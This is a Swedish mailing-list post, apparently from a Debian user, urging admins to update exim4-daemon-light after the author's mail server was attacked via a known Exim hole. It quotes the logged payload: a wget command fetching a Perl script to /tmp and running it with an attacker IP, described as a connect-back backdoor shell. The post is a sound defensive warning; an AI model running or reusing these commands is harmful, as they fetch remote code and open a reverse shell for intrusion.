Attack mot Exim4
Jag vill uppmana alla att hämta den nya och avsäkrade
versionen av Exim4-daemon-light eller motsvarande.
Saken är den att
10 december: Exim4 uppdateras mot CVE-2010-434
13 december: Min lilla elbrevstjänst angreps.
14 december: Jag hämtade exim4-daemon-light_4.69-9+lenny1
Glipan är i högsta grad verklig och dessutom välkänd.
Min maskin handhar inte mer än femtio till sextio medelande
varje dygn, men hamnade likafullt i blickfånget eftersom den
mottager elbrev från omvärden.
De synliga tecknen på angreppet var
/tmp/c.pl
/var/log/exim4/paniclog skapades med en rad.
Det fientliga meddelande förkastade men lämnade
sina spår i /var/log/exim4/{rejectlog,mainlog}.
Logcheck vidarebefodrade sin analys av händelsen.
Det inkommande meddelandet innehåller en ACL-anvisning som
i sig bär på en lång upprepning av wget kommandon:
wget http://www.gup24.de/dc.txt -O /tmp/c.pl
perl /tmp/c.pl 72.249.152.50
Använd de motmedel Ni önskar utifrån dessa adresser.
Filen c.pl omtalar
code by:LorD
We Are:LorD-C0d3r-NT
ConnectBack Backdoor Shell vs 1.0 by LorD
of IRAN HACKERS SABOTAGE
För den vetgirige tillfogar jag detaljer,
men det viktiga är att hämta det nya paket.
Bästa hälsningar
Dess syfte är att öppna en IPv4 ström till ip-adressen ovan
och att sända tillbaka $(uname -a), $(id), $(pwd) med text-
avskiljare, samt att till slut att komma åt kommandotolken
genom $(/bin/sh).
Självklar görs detta med system() i Perl!
Reply to: